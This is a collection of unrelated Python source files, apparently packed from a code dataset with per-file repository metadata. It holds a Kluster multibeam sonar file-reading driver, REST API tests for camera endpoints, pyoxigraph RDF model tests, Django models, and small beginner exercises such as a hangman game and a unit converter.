int(fileext[1]), int(fileext[2]), int(fileext[3])
except:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported position (POS) file (.000 -> .999)'.format(pos_file))
def _check_export_log_file(log_file: str):
fileext = os.path.splitext(log_file)[1]
if fileext not in kluster_variables.supported_ppnav_log:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported export log file ({})'.format(log_file, kluster_variables.supported_ppnav_log))
def _check_svp_file(svp_file: str):
fileext = os.path.splitext(svp_file)[1]
if fileext not in kluster_variables.supported_sv:
raise NotImplementedError('fqpr_drivers: File ({}) is not a Kluster supported sound velocity file ({})'.format(svp_file, kluster_variables.supported_sv))
def fast_read_multibeam_metadata(multibeam_file: str, gather_times: bool = True, gather_serialnumber: bool = True):
"""
Return metadata from a multibeam file using the fast read methods. Fast read methods allow getting small amounts of
data without reading the entire file. These include: the start and end time of the file in utc seconds, the serial
number(s) of the multibeam sonar in the file. Use gather_times and gather_serialnumber to select which/both of these options.
Multibeam file must be one of the multibeam files that we support in Kluster, see kluster_variables.supported_multibeam
Parameters
----------
multibeam_file
multibeam file
gather_times
if True, returns the start and end time of the file
gather_serialnumber
if True, returns the serial number(s) of the multibeam sonar in the file
Returns
-------
str
the type of multibeam file discovered, i.e. 'kongsberg_all'
list
[UTC start time in seconds, UTC end time in seconds] or None if gather_times is False
list
[serialnumber: int, secondaryserialnumber: int, sonarmodelnumber: str] or None if gather_serialnumber is False
"""
_check_multibeam_file(multibeam_file)
fileext = os.path.splitext(multibeam_file)[1]
if fileext == '.all':
mtype = 'kongsberg_all'
aread = par3.AllRead(multibeam_file)
if gather_times:
start_end = aread.fast_read_start_end_time()
else:
start_end = None
if gather_serialnumber:
serialnums = aread.fast_read_serial_number()
else:
serialnums = None
aread.close()
elif fileext == '.kmall':
mtype = 'kongsberg_kmall'
km = kmall.kmall(multibeam_file)
if gather_times:
start_end = km.fast_read_start_end_time()
else:
start_end = None
if gather_serialnumber:
serialnums = km.fast_read_serial_number()
else:
serialnums = None
km.closeFile()
else:
raise NotImplementedError('fqpr_drivers: {} is supported by kluster, but not currently supported by fast_read_multibeam_metadata'.format(multibeam_file))
return mtype, start_end, serialnums
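# Usage sketch (illustrative; the file path is hypothetical):
#
#     mtype, (start, end), serials = fast_read_multibeam_metadata('0001_survey.all')
#     print(mtype, start, end, serials)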
def return_xyz_from_multibeam(multibeam_file: str):
"""
Return the already sound velocity corrected data that is in the multibeam file. We use this to compare with Kluster
data in a couple functions.
Parameters
----------
multibeam_file
multibeam file of interest
Returns
-------
np.ndarray
one dimensional array of acrosstrack for the soundings
np.ndarray
one dimensional array of alongtrack for the soundings
np.ndarray
one dimensional array of depth offsets for the soundings
np.ndarray
one dimensional array of utc timestamps for the soundings
np.ndarray
one dimensional array of ping counters for the soundings
"""
_check_multibeam_file(multibeam_file)
mbes_extension = os.path.splitext(multibeam_file)[1]
if mbes_extension == '.all':
print('Reading from xyz88/.all file with par Allread...')
x, y, z, times, counters = _xyz_from_allfile(multibeam_file)
elif mbes_extension == '.kmall':
print('Reading from MRZ/.kmall file with kmall reader...')
x, y, z, times, counters = _xyz_from_kmallfile(multibeam_file)
else:
raise NotImplementedError('fqpr_drivers: {} is supported by kluster, but not currently supported by return_xyz_from_multibeam'.format(multibeam_file))
return x, y, z, times, counters
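# Usage sketch (illustrative; the file path is hypothetical):
#
#     x, y, z, times, counters = return_xyz_from_multibeam('0001_survey.kmall')
#     # x, y, z hold the sounding offsets already sv-corrected by the sonar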
def sequential_read_multibeam(multibeam_file: str, start_pointer: int = 0, end_pointer: int = 0, first_installation_rec: bool = False):
"""
Run the sequential read function built in to all multibeam drivers in Kluster. Sequential read takes a multibeam file
(with an optional start/end pointer in bytes) and reads all the datagrams of interest sequentially, skipping any that
are not in the required datagram lookups.
Parameters
----------
multibeam_file
multibeam file of interest
start_pointer
the start pointer that we start the read at
end_pointer
the end pointer where we finish the read
first_installation_rec
if True, will just read the installation parameters entry and finish
Returns
-------
dict
nested dictionary object containing all the numpy arrays for the data of interest
"""
_check_multibeam_file(multibeam_file)
multibeam_extension = os.path.splitext(multibeam_file)[1]
if multibeam_extension == '.all':
ar = par3.AllRead(multibeam_file, start_ptr=start_pointer, end_ptr=end_pointer)
recs = ar.sequential_read_records(first_installation_rec=first_installation_rec)
ar.close()
elif multibeam_extension == '.kmall':
km = kmall.kmall(multibeam_file)
# kmall doesnt have ping-wise serial number in header, we have to provide it from install params
serial_translator = km.fast_read_serial_number_translator()
recs = km.sequential_read_records(start_ptr=start_pointer, end_ptr=end_pointer, first_installation_rec=first_installation_rec,
serial_translator=serial_translator)
km.closeFile()
else:
raise NotImplementedError('fqpr_drivers: {} is supported by kluster, but not currently supported by sequential_read_multibeam'.format(multibeam_file))
return recs
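# Usage sketch (illustrative; the file path is hypothetical):
#
#     recs = sequential_read_multibeam('0001_survey.all')
#     print(recs.keys())  # nested dictionary of numpy arrays per record type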
def read_first_fifty_records(file_object):
if isinstance(file_object, par3.AllRead):
par3.print_some_records(file_object, recordnum=50)
elif isinstance(file_object, kmall.kmall):
kmall.print_some_records(file_object, recordnum=50)
elif isinstance(file_object, PCSio.PCSBaseFile):
PCSio.print_some_records(file_object, recordnum=50)
elif isinstance(file_object, np.ndarray):
sbet.print_some_records(file_object, recordnum=50)
else:
print(f'read_first_fifty_records: Unsupported file object: {file_object}')
def kluster_read_test(file_object):
if isinstance(file_object, par3.AllRead):
par3.kluster_read_test(file_object, byte_count=-1)
else:
        print(f'kluster_read_test: Unsupported file object: {file_object}')
def return_xarray_from_sbet(sbetfiles: list, smrmsgfiles: list = None, logfiles: list = None, weekstart_year: int = None,
weekstart_week: int = None, override_datum: str = None, override_grid: str = None,
override_zone: str = None, override_ellipsoid: str = None):
"""
Read all the provided nav files, error files and concatenate the result in to a single xarray dataset.
Parameters
----------
sbetfiles
list of full file paths to the sbet files
smrmsgfiles
list of full file paths to the smrmsg files
logfiles
list of full file paths to the sbet export log files
weekstart_year
if you aren't providing a logfile, must provide the year of the sbet here
weekstart_week
if you aren't providing a logfile, must provide the week of the sbet here
override_datum
provide a string datum identifier if you want to override what is read from the log or you don't have a log, ex: 'NAD83 (2011)'
override_grid
provide a string grid identifier if you want to override what is read from the log or you don't have a log, ex: 'Universal Transverse Mercator'
override_zone
provide a string zone identifier if you want to override what is read from the log or you don't have a log, ex: 'UTM North 20 (66W to 60W)'
override_ellipsoid
provide a string ellipsoid identifier if you want to override what is read from the log or you don't have a log, ex: 'GRS80'
Returns
-------
xarray Dataset
data and attribution from the sbets relevant to our survey processing
"""
[_check_sbet_file(fil) for fil in sbetfiles]
if smrmsgfiles is not None:
[_check_sbet_file(fil) for fil in smrmsgfiles]
if logfiles is not None:
[_check_export_log_file(fil) for fil in logfiles]
return sbet.sbets_to_xarray(sbetfiles, smrmsgfiles, logfiles, weekstart_year, weekstart_week, override_datum,
override_grid, override_zone, override_ellipsoid)
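# Usage sketch (illustrative; all file paths are hypothetical):
#
#     nav = return_xarray_from_sbet(['sbet.out'], smrmsgfiles=['smrmsg.out'],
#                                   logfiles=['export_log.txt'])
#     print(nav)  # xarray Dataset of navigation and error data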
def return_xarray_from_posfiles(posfiles: list, weekstart_year: int, weekstart_week: int):
"""
Read all the provided pos files, error files and concatenate the result in to a single xarray dataset.
Parameters
----------
posfiles
list of full file paths to the pos files
weekstart_year
must provide the year of the posfiles here
weekstart_week
must provide the gpsweek of the posfiles here
Returns
-------
xarray Dataset
data and attribution from the posfiles relevant to our survey processing
"""
[_check_pos_file(fil) for fil in posfiles]
return PCSio.posfiles_to_xarray(posfiles, weekstart_year, weekstart_week)
def return_offsets_from_posfile(posfile: str):
"""
Translate the MSG20 message in the POS File to xyzrph like sensor names. Use this to populate an existing
xyzrph record built by kluster to get the POSMV imu/antenna related sensors.
Parameters
----------
posfile
path to a posmv file
Returns
-------
dict
dictionary of offset/angle names to values found in the MSG20 message
"""
_check_pos_file(posfile)
pcs = PCSio.PCSFile(posfile, nCache=0)
try:
pcs.CacheHeaders(read_first_msg=(20, '$MSG'))
msg20 = pcs.GetArray("$MSG", 20)
data = {'tx_to_antenna_x': round(msg20[0][10], 3), 'tx_to_antenna_y': round(msg20[0][11], 3),
'tx_to_antenna_z': round(msg20[0][12], 3),
'imu_h': round(msg20[0][21], 3), 'imu_p': round(msg20[0][20], 3), 'imu_r': round(msg20[0][19], 3),
'imu_x': round(msg20[0][7], 3), 'imu_y': round(msg20[0][8], 3), 'imu_z': round(msg20[0][9], 3)}
return data
except KeyError:
try:
print('Unable to read from {}: message 20 not found'.format(posfile))
print('Found {}'.format(list(pcs.sensorHeaders.keys())))
except:
print('Unable to read from file: {}'.format(posfile))
return None
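# Usage sketch (illustrative; the .000 file path is hypothetical):
#
#     offsets = return_offsets_from_posfile('vessel_2020_180.000')
#     if offsets is not None:
#         print(offsets['tx_to_antenna_x'], offsets['imu_h'])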
def fast_read_sbet_metadata(sbet_file: str):
"""
Determine the start and end time of the provided sbet file by reading the first and last record.
Parameters
----------
sbet_file
full file path to a sbet file
Returns
-------
list
list of floats, [start time, end time] for the sbet
"""
_check_sbet_file(sbet_file)
tms = sbet.sbet_fast_read_start_end_time(sbet_file)
return tms
def fast_read_errorfile_metadata(smrmsg_file: str):
"""
Determine the start and end time of the provided smrmsg file by reading the first and last record.
Parameters
----------
smrmsg_file
full file path to a smrmsg file
Returns
-------
list
list of floats, [start time, end time] for the smrmsg file
"""
_check_sbet_file(smrmsg_file)
tms = sbet.smrmsg_fast_read_start_end_time(smrmsg_file)
return tms
def read_pospac_export_log(exportlog_file: str):
"""
Read the POSPac export log to get the relevant attributes for the exported SBET. SBET basically has no metadata,
so this log file it generates is the only way to figure it out. Log file is plain text, looks something like this:
--------------------------------------------------------------------------------
EXPORT Data Export Utility [Jun 18 2018]
Copyright (c) 1997-2018 Applanix Corporation. All rights reserved.
Date : 09/09/18 Time : 17:01:12
--------------------------------------------------------------------------------
Mission date : 9/9/2018
Input file : S:\\2018\\...sbet_H13131_251_2702.out
Output file : S:\\2018\\...export_H13131_251_2702.out
Output Rate Type : Specified Time Interval
Time Interval : 0.020
Start time : 0.000
End time : 999999.000
UTC offset : 18.000
Lat/Lon units : Radians
Height : Ellipsoidal
Grid : Universal Transverse Mercator
Zone : UTM North 01 (180W to 174W)
Datum : NAD83 (2011)
Ellipsoid : GRS 1980
Transformation type : 14 Parameter
Target epoch : 2018.687671
--------------------------------------------------------------------------------
Processing completed.
Parameters
----------
exportlog_file: str, file path to the log file
Returns
-------
attrs: dict, relevant data from the log file as a dictionary
"""
_check_export_log_file(exportlog_file)
loginfo = sbet.get_export_info_from_log(exportlog_file)
return loginfo
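# Usage sketch (illustrative; the log path is hypothetical):
#
#     loginfo = read_pospac_export_log('export_H13131_251_2702.log')
#     print(loginfo)  # dict of datum/grid/zone/ellipsoid details parsed from the log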
def is_sbet(sbet_file: str):
"""
Check if the file is an sbet. Ideally we just rely on the checking if the file contains an even number of 17 doubles,
but add in the time check just in case.
Parameters
----------
sbet_file
file path to a POSPac sbet file
Returns
-------
bool
True if file is an sbet, False if not
"""
_check_sbet_file(sbet_file)
return sbet.is_sbet(sbet_file)
def is_smrmsg(smrmsg_file: str):
"""
Check if the file is an smrmsg file. Ideally we just rely on the checking if the file contains an even number of 10 doubles,
but add in the time check just in case.
Parameters
----------
smrmsg_file
file path to a POSPac smrmsg file
Returns
-------
bool
True if file is an smrmsg, False if not
"""
_check_sbet_file(smrmsg_file)
return sbet.is_smrmsg(smrmsg_file)
def read_soundvelocity_file(svp_file: str):
"""
Export out the information in the svp file as a dict. Keys include 'number_of_profiles', 'svp_julian_day',
'svp_time_utc', 'latitude', 'longitude', 'source_epsg', 'utm_zone', 'utm_hemisphere', 'number_of_layers', 'profiles'.
Returns
-------
dict
dictionary of the class information
"""
_check_svp_file(svp_file)
svp_object = svp.CarisSvp(svp_file)
svp_dict = svp_object.return_dict()
return svp_dict
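# Usage sketch (illustrative; the svp path is hypothetical):
#
#     svp_dict = read_soundvelocity_file('2020_094_162423.svp')
#     print(svp_dict['number_of_profiles'], svp_dict['svp_time_utc'])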
def _xyz_from_allfile(filname: str):
"""
function using par to pull out the xyz88 datagram and return the xyz for each ping. Times returned are a sum of
ping time and delay time (to match Kluster, I do this so that times are unique across sector identifiers).
Parameters
----------
filname
str, path to .all file
Returns
-------
np.array
2d numpy array (time, beam) of the alongtrack offsets from the xyz88 record
np.array
2d numpy array (time, beam) of the acrosstrack offsets from the xyz88 record
np.array
2d numpy array (time, beam) of the depth offsets from the xyz88 record
np.array
numpy array of the times from the xyz88 record
np.array
numpy array of the ping counter index from the xyz88 record
"""
pfil = par3.AllRead(filname)
pfil.mapfile()
num88 = len(pfil.map.packdir['88'])
numbeams = pfil.getrecord(88, 0).data['Depth'].shape[0]
dpths = np.zeros((num88, numbeams))
xs = np.zeros((num88, numbeams))
ys = np.zeros((num88, numbeams))
tms = np.zeros(num88)
cntrs = np.zeros(num88)
for i in range(num88):
try:
rec88 = pfil.getrecord(88, i)
rec78 = pfil.getrecord(78, i)
dpths[i, :] = rec88.data['Depth']
ys[i, :] = rec88.data['AcrossTrack']
xs[i, :] = rec88.data['AlongTrack']
tms[i] = rec88.time + rec78.tx_data.Delay[0] # match par sequential_read, ping time = timestamp + delay
cntrs[i] = rec88.Counter
except IndexError:
break
# ideally this would do it, but we have to sort by prim/stbd arrays when cntr/times are equal between heads for dual head
cntrsorted = np.argsort(cntrs)
tms = tms[cntrsorted]
xs = xs[cntrsorted]
ys = ys[cntrsorted]
dpths = dpths[cntrsorted]
cntrs = cntrs[cntrsorted]
pfil.close()
return xs, ys, dpths, tms, cntrs
def _xyz_from_kmallfile(filname: str):
"""
function using kmall to pull out the xyz88 datagram and return the xyz for each ping. Times returned are a sum of
ping time and delay time (to match Kluster, I do this so that times are unique across sector identifiers).
The kmall svcorrected soundings are rel ref point and not tx. We need to remove the reference point lever arm
to get the valid comparison with kluster. Kluster sv correct is rel tx.
Parameters
----------
filname
str, path to .all file
Returns
-------
np.array
2d numpy array (time, beam) of the alongtrack offsets from the MRZ record
np.array
2d numpy array (time, beam) of the acrosstrack offsets from the MRZ record
np.array
2d numpy array (time, beam) of the depth offsets from the MRZ record
np.array
numpy array of the times from the MRZ record
np.array
numpy array of the ping counter index from the MRZ record
"""
km = kmall.kmall(filname)
km.index_file()
numpings = km.Index['MessageType'].value_counts()["b'#MRZ'"]
numbeams = len(km.read_first_datagram('MRZ')['sounding']['z_reRefPoint_m'])
dpths = np.zeros((numpings, numbeams))
xs = np.zeros((numpings, numbeams))
ys = np.zeros((numpings, numbeams))
tms = np.zeros(numpings)
cntrs = np.zeros(numpings)
install = km.read_first_datagram('IIP')
read_count = 0
for offset, size, mtype in zip(km.Index['ByteOffset'],
km.Index['MessageSize'],
km.Index['MessageType']):
km.FID.seek(offset, 0)
if mtype == "b'#MRZ'":
dg = km.read_EMdgmMRZ()
xs[read_count, :] = np.array(dg['sounding']['x_reRefPoint_m'])
ys[read_count, :] = np.array(dg['sounding']['y_reRefPoint_m'])
# we want depths rel tx to align with our sv correction output
dpths[read_count, :] = np.array(dg['sounding']['z_reRefPoint_m']) - \
float(install['install_txt']['transducer_1_vertical_location'])
tms[read_count] = dg['header']['dgtime']
cntrs[read_count] = dg['cmnPart']['pingCnt']
read_count += 1
if read_count != numpings:
raise ValueError('kmall index count for MRZ records does not match actual records read')
cntrsorted = np.argsort(cntrs) # ideally this would do it, but we have to sort by prim/stbd arrays when cntr/times
# are equal between heads for dual head
tms = tms[cntrsorted]
xs = xs[cntrsorted]
ys = ys[cntrsorted]
dpths = dpths[cntrsorted]
cntrs = cntrs[cntrsorted]
km.closeFile()
return xs, ys, dpths, tms, cntrs
| 2.21875 | 2 |
01_Primeiros passos_Fundamentos/05_metros_centimentos.py | Basilio40/exercicios_Python | 0 | 12796837 | '''Faça um Programa que converta metros para centímetros.'''
# Resposta:
metro = float(input('Informe a media em metros: '))
cent = int(metro * 100)
print(f'Convertendo {metro}m em centímetros, temos: {cent}cm')
| 4.34375 | 4 |
test/test_cam_v1.py | dondemonz/RestApi | 0 | 12796838 | import requests
from model.json_check import *
from model.input_data import *
# Request for the settings of all CAM objects
def test_GetV1AllCamerasCode200():
data = "success"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["status"]
assert data == n
def test_GetV1AllCamerasStatus401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
# Request for the settings of a single CAM object
def test_GetV1CamerasByIdCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId, auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CamerasByIdCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId, auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CamerasByIdCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Request for the 'status' field of a CAM object
def test_GetV1CameraStatusCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/status", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraStatusCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/status", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraStatusCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/status", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Request for the 'rtsp' field of a CAM object
def test_GetV1CameraRtspCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Request for the 'rtsp/live' field of a CAM object
def test_GetV1CameraRtspLiveCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/live", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspLiveCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/live", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspLiveCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp/live", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
# Request for the 'rtsp/archive' field of a CAM object
def test_GetV1CameraRtspArchiveCode200():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/archive", auth=auth)
user_resp_code = "200"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["data"]["id"]
assert camId == n
def test_GetV1CameraRtspArchiveCode401():
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/"+camId+"/rtsp/archive", auth=("", ""))
user_resp_code = "401"
assert str(response.status_code) == user_resp_code
def test_GetV1CameraRtspArchiveCode404():
data = "Unknown CAM id:0"
response = requests.get(url="http://"+slave_ip+":"+restPort+"/api/v1/cameras/0/rtsp/archive", auth=auth)
user_resp_code = "404"
assert str(response.status_code) == user_resp_code
body = json.dumps(response.json())
data1 = json.loads(body)
n = data1["message"]
assert data == n
| 2.6875 | 3 |
main.py | tuttofaredigitale/hangman-game | 0 | 12796839 | import random
from impiccato_disegno import d_impiccato, logo
from parole_impiccato import lista_parole
scelta_parola = random.choice(lista_parole)
print(logo)
game_over = False
energia = len(d_impiccato)-1
campo_gioco = []
for i in scelta_parola:
campo_gioco += '_'
while not game_over:
indovina = input('Indovina la lettera: ')
for posizione in range(len(scelta_parola)):
lettera = scelta_parola[posizione]
if lettera == indovina:
campo_gioco[posizione] = lettera
print(f"{' '.join(campo_gioco)}")
if indovina not in scelta_parola:
print(f"Hai tentato con la lettera {indovina}, non è la lettera corretta. Hai perso una vita.")
energia -= 1
if energia == 0:
game_over = True
print(f"Hai perso! La parola corretta era {scelta_parola}")
if not '_' in campo_gioco:
game_over = True
print('Complimenti hai vinto!')
print(d_impiccato[energia])
| 3.421875 | 3 |
pythonbrasil/exercicios/decisao/DE resp 03.py | adinsankofa/python | 0 | 12796840 | fm = str(input("Digite o sexo - [M - Masculino] ou [F - Feminino]: "))
def foum():
if fm == "M":
print("M - Masculino")
if fm == "F":
print("F - Feminino")
def si():
    global fm  # fm is reassigned inside the loop, so it must refer to the module-level variable
    while fm != "M" and fm != "F":
        print("Sexo inválido, tente novamente!")
        fm = str(input("Digite o sexo - [M - Masculino] ou [F - Feminino]: "))
        foum()
si()
foum()
| 3.796875 | 4 |
python/tests/test_model.py | alexkreidler/oxigraph | 403 | 12796841 | import unittest
from pyoxigraph import *
XSD_STRING = NamedNode("http://www.w3.org/2001/XMLSchema#string")
XSD_INTEGER = NamedNode("http://www.w3.org/2001/XMLSchema#integer")
RDF_LANG_STRING = NamedNode("http://www.w3.org/1999/02/22-rdf-syntax-ns#langString")
class TestNamedNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(NamedNode("http://foo").value, "http://foo")
def test_string(self):
self.assertEqual(str(NamedNode("http://foo")), "<http://foo>")
def test_equal(self):
self.assertEqual(NamedNode("http://foo"), NamedNode("http://foo"))
self.assertNotEqual(NamedNode("http://foo"), NamedNode("http://bar"))
class TestBlankNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(BlankNode("foo").value, "foo")
self.assertNotEqual(BlankNode(), BlankNode())
def test_string(self):
self.assertEqual(str(BlankNode("foo")), "_:foo")
def test_equal(self):
self.assertEqual(BlankNode("foo"), BlankNode("foo"))
self.assertNotEqual(BlankNode("foo"), BlankNode("bar"))
self.assertNotEqual(BlankNode('foo'), NamedNode('http://foo'))
self.assertNotEqual(NamedNode('http://foo'), BlankNode('foo'))
class TestLiteral(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Literal("foo").value, "foo")
self.assertEqual(Literal("foo").datatype, XSD_STRING)
self.assertEqual(Literal("foo", language="en").value, "foo")
self.assertEqual(Literal("foo", language="en").language, "en")
self.assertEqual(Literal("foo", language="en").datatype, RDF_LANG_STRING)
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).value, "foo")
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).datatype, XSD_INTEGER)
def test_string(self):
self.assertEqual(str(Literal("foo")), '"foo"')
self.assertEqual(str(Literal("foo", language="en")), '"foo"@en')
self.assertEqual(
str(Literal("foo", datatype=XSD_INTEGER)),
'"foo"^^<http://www.w3.org/2001/XMLSchema#integer>',
)
def test_equals(self):
self.assertEqual(Literal("foo", datatype=XSD_STRING), Literal("foo"))
self.assertEqual(
Literal("foo", language="en", datatype=RDF_LANG_STRING),
Literal("foo", language="en"),
)
self.assertNotEqual(NamedNode('http://foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), NamedNode('http://foo'))
self.assertNotEqual(BlankNode('foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), BlankNode('foo'))
class TestTriple(unittest.TestCase):
def test_constructor(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
def test_mapping(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
def test_destruct(self):
(s, p, o) = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestQuad(unittest.TestCase):
def test_constructor(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
self.assertEqual(t.graph_name, NamedNode("http://example.com/g"))
self.assertEqual(
t.triple,
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
)
self.assertEqual(
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
DefaultGraph(),
),
)
def test_mapping(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
self.assertEqual(t[3], NamedNode("http://example.com/g"))
def test_destruct(self):
(s, p, o, g) = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
self.assertEqual(g, NamedNode("http://example.com/g"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestVariable(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Variable("foo").value, "foo")
def test_string(self):
self.assertEqual(str(Variable("foo")), "?foo")
def test_equal(self):
self.assertEqual(Variable("foo"), Variable("foo"))
self.assertNotEqual(Variable("foo"), Variable("bar"))
if __name__ == "__main__":
unittest.main()
| 3.015625 | 3 |
Modules-in-python/getpass/getpass-getpass-function.py | tverma332/python3 | 3 | 12796842 | import getpass # importing getpass
dpass = getpass.getpass(prompt = "Enter the password: ") # the default prompt is 'Password: ' if none is given
print(f"The entered password is {dpass}") | 3.375 | 3 |
filtering_posts/models.py | Unkorunk/filtering-posts | 0 | 12796843 | from django.db import models
import datetime
class Region(models.Model):
name = models.CharField(max_length=200)
class University(models.Model):
address = models.CharField(max_length=255)
affilation_name = models.CharField(max_length=255)
author_count = models.IntegerField(default=0)
city = models.CharField(max_length=200)
country = models.CharField(max_length=200)
date_created = models.DateField()
document_count = models.IntegerField(default=0)
eid = models.CharField(max_length=200)
identifier = models.CharField(max_length=200)
org_domain = models.CharField(max_length=200)
org_type = models.CharField(max_length=200)
org_url = models.CharField(max_length=200)
postal_code = models.CharField(max_length=200)
scopus_affiliation_link = models.CharField(max_length=200)
search_link = models.CharField(max_length=200)
self_link = models.CharField(max_length=200)
state = models.ForeignKey(Region, on_delete=models.CASCADE)
url = models.CharField(max_length=200)
lat = models.FloatField(default=0.0)
lon = models.FloatField(default=0.0)
class Author(models.Model):
affilation_current = models.ForeignKey(University, on_delete=models.CASCADE)
citation_count = models.IntegerField(default=0)
cited_by_count = models.IntegerField(default=0)
coauthor_count = models.IntegerField(default=0)
coauthor_link = models.CharField(max_length=255)
date_created = models.DateField()
document_count = models.IntegerField(default=0)
eid = models.CharField(max_length=200)
given_name = models.CharField(max_length=200)
h_index = models.CharField(max_length=100)
identifier = models.CharField(max_length=100)
indexed_name = models.CharField(max_length=100)
initials = models.CharField(max_length=100)
orc_id = models.CharField(max_length=100)
publication_range = models.CharField(max_length=100)
scopus_author_link = models.CharField(max_length=255)
search_link = models.CharField(max_length=255)
self_link = models.CharField(max_length=255)
